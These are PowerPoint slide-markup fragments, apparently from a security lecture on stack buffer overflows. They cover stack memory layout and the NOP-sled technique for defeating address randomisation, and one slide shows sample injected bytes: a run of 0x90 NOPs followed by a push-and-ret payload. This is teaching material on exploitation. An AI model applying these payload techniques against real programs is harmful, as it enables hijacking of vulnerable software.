              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9107817" y="351624"/>
            <a:ext cx="1170898" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735D4B4E-7E4D-9540-8E2A-7273AB7E85B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578415" y="4065985"/>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0x7ffc43edef80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067CF698-CAEE-C447-A032-D2245E611406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705989" y="5256336"/>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0x7ffe6e24d560</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD30F1A-45AC-1541-8850-D24D763CB2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578415" y="5256336"/>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0x7ffe14b6fd80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rounded Rectangle 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F528300D-7C2A-D54B-96EB-22BA856C7DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705989" y="4061011"/>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0x7ffd5f422ea0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174599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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="14" presetClass="entr" presetSubtype="5" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(vertical)">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Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP Sled</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D5FDAA-D6CE-F440-9BB8-4F4050FE9554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7028145" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Precede exploit code with long series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“no op” = “no operation” = “do nothing”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x86: 0x90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A64: 0xD503201F (“HINT: NOP”)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A32: 0xE1A00000 (“MOV R0, R0”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack offset’s randomness is bounded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address points to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>somewhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in NOP sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute all NOPs between there and exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute exploit code</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9" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4AEB9E0-9496-BA49-A900-0195313831C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8963628" y="808695"/>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0" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56DCC13A-05E1-1A4A-A8EB-516648A8C1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8963628" y="1375855"/>
            <a:ext cx="1469984" cy="496053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exploit code</a:t>
            </a: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nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C385E6-FAE5-4745-9595-8D0218BE8899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959452" y="5298217"/>
            <a:ext cx="1469978" cy="467508"/>
            <a:chOff x="9124097" y="5147021"/>
            <a:chExt cx="1305335" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DECE674D-B523-3E49-B829-BADED40C93AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="912409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4D6CA6-2F11-A74D-A2FB-197C04D1C63F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928642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16E659-AA9D-4648-9A6A-9C1EECB82716}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9448749"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46FE6B-3E5F-F842-AB54-628CCF673B7F}"/>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476E4B-27C0-BC45-B86A-367A623720CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9778403"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0DE969-539B-8047-84F0-954516EE0AC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994095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556F1AF-EC90-444A-8115-6BEE2446ED74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1010558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D98095-8DFF-3146-8C18-6AAC7B6F32DA}"/>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AAB8784A-15D0-5C4F-9AA9-740285BF92BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787588" y="5347287"/>
            <a:ext cx="1408527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC63F67B-1720-3045-B1A3-34C61D735484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196115" y="5531953"/>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1F77D8A2-E19A-F947-B839-5E6FF01E02DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8963628" y="1092274"/>
            <a:ext cx="12700" cy="2763849"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5153425"/>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Up Arrow 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{016AF33A-0045-544C-A8AD-82F79CD5C0EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10172499" y="1690688"/>
            <a:ext cx="328450" cy="22800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619AC79-D315-4849-A122-506ADB1FEB8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10433612" y="2311740"/>
            <a:ext cx="1474121" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute NOPs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to get to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253776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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refresher on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Layout</a:t>
            </a:r>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="70" name="Straight Connector 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F99A50A-4929-4C48-894D-F074B856E742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346693" y="406603"/>
            <a:ext cx="6351927" cy="6323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264EEA1-4832-B84C-BF0B-545B4F1BBBD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346693" y="1231103"/>
            <a:ext cx="5616935" cy="494076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EF797714-2079-F342-BAEF-5A25579E3B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADE7B75-2ACC-E446-98E0-CC155B00DDE9}"/>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2FDA9CBE-0304-674D-A4BF-47844C23A952}"/>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3" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51FFDEB-142D-4048-AB62-03F91861278D}"/>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5" name="Rectangle 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDB88D6-8825-624C-9CC6-243A712B8E96}"/>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7" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F9C852-A40C-3F4A-A73F-4436081AA8B0}"/>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8" name="TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20526AB4-325F-D947-8B47-B893D418BA9A}"/>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9" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E45171E-3542-2243-9013-94D493C218BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="2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4F15EDEA-CF64-9E4E-AF31-E3AB3A7055F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1876709" y="406603"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7C4400-EA24-D14A-890D-3CE7B13394EF}"/>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0" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A6BBF8-AFFD-B54A-98BD-881940F3BE01}"/>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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED486A75-0E27-A146-B5D5-3D90CE05D4EC}"/>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12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7DECB0-A884-5244-9827-CDE2E907B478}"/>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C412BB2C-11D2-7D44-ABAC-AF3C51982CD3}"/>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4" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B8E799-790A-9640-98F8-680F7F45E80D}"/>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15" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2F27C6-69A9-F845-BADD-8D92BF122337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161B78C6-3A74-4C42-A7E0-1C652D7F8D3E}"/>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17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671925DF-4169-0442-9B0B-ECCCE80A9BEB}"/>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18" name="Straight Arrow Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A748E03B-9EEB-B24E-9AC5-DC8E718A0EDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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8CADEF-F149-6645-8127-51590E96A62F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10"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86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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.52917 -0.36991 L 0 4.81481E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="26458" y="18495"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="with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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="22" presetClass="entr" presetSubtype="8"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left)">
                                      <p:cBhvr>
                                        <p:cTn id="1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Counter-countermeasure</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOP Sled</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D2C9BE-0696-8640-9B49-A1E9AE24A900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5342710" y="39756"/>
            <a:ext cx="6809534" cy="6779030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2966BF5-BD40-8E43-858A-E7FA1C8B74E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222732" y="3321976"/>
            <a:ext cx="3306053" cy="952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90 90 90 90 90 90 90 90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>90 90 68 48 06 40 00 c3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
